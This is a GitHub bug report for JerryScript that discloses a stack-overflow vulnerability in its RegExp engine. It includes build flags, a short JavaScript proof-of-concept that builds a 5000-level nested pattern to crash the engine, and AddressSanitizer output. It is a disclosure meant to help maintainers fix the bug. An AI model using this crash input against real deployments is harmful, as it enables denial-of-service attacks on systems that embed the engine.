Skip to content

stack-overflow jerry-core/ecma/operations/ecma-regexp-object.c:535 in ecma_regexp_run #5265

New issue
New issue
Open
Open
stack-overflow jerry-core/ecma/operations/ecma-regexp-object.c:535 in ecma_regexp_run#5265
@Qanux

Description

@Qanux
Qanux
opened on Dec 3, 2025

Description

A stack overflow vulnerability was discovered in the JerryScript RegExp engine. The ecma_regexp_run function uses unbounded recursion when processing deeply nested patterns, leading to stack exhaustion and a crash (SIGSEGV).

JerryScript revision

b706935

Build platform

Ubuntu 22.04 LTS

Build steps

python3 tools/build.py --debug --lto=off --compile-flag=-fsanitize=address --compile-flag=-D_POSIX_C_SOURCE=200809 --compile-flag=-Wno-strict-prototypes

Test case

try {
    var depth = 5000;
    var s = "a".repeat(depth);
    var p = "";
    
    for(var i=0; i<depth; i++) p += "(";
    p += "a".repeat(depth);
    for(var i=0; i<depth; i++) p += ")";
    
    var re = new RegExp(p);
    re.test(s);
} catch(e) {
    print("Caught: " + e);
}

Execution steps

./build/bin/jerry poc.js

Output

Testing RegExp with depth 5000...
AddressSanitizer:DEADLYSIGNAL
=================================================================
==52670==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc243b7ca8 (pc 0x57e96b89ab1e bp 0x7ffc243b8050 sp 0x7ffc243b7be0 T0)
    #0 0x57e96b89ab1e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:535
    #1 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #2 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #3 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #4 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #5 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #6 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #7 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712
    #8 0x57e96b89b97e in ecma_regexp_run /mnt/d/desktop/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:712

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions